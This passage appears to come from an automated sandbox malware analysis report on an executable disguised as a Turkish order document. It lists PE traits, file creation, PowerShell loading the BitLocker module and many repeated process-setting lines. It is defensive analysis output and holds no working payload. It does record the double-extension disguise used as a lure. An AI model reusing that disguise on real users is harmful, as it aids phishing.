                  Source: fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                  Source: fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeStatic PE information: Virtual size of .text is bigger than: 0x100000
                  Source: fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeStatic file information: File size 1082368 > 1048576
                  Source: fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeStatic PE information: Raw size of .text is bigger than: 0x100000 < 0x106800
                  Source: fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                  Source: fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                  Source: Binary string: lwhS.pdbSHA256 source: fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe
                  Source: Binary string: lwhS.pdb source: fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeCode function: 4_2_07B704EB push ecx; ret 4_2_07B704EC
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeCode function: 4_2_07B7AC48 push eax; retf 4_2_07B7AC49
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeCode function: 11_2_0577A75C push 00000062h; retn 006Dh11_2_0577A75E
                  Source: fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeStatic PE information: section name: .text entropy: 7.382712715601936
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeFile created: \fiyati_teklif 65tbi20_ on-san vakum san tic_ sipari#u015fi jpeg docx .exe
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeFile created: \fiyati_teklif 65tbi20_ on-san vakum san tic_ sipari#u015fi jpeg docx .exe
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeFile created: \fiyati_teklif 65tbi20_ on-san vakum san tic_ sipari#u015fi jpeg docx .exe
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeFile created: \fiyati_teklif 65tbi20_ on-san vakum san tic_ sipari#u015fi jpeg docx .exeJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeFile created: \fiyati_teklif 65tbi20_ on-san vakum san tic_ sipari#u015fi jpeg docx .exeJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeFile created: \fiyati_teklif 65tbi20_ on-san vakum san tic_ sipari#u015fi jpeg docx .exeJump to behavior

                  Hooking and other Techniques for Hiding and Protection

                  barindex
                  Loading BitLocker PowerShell Module
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
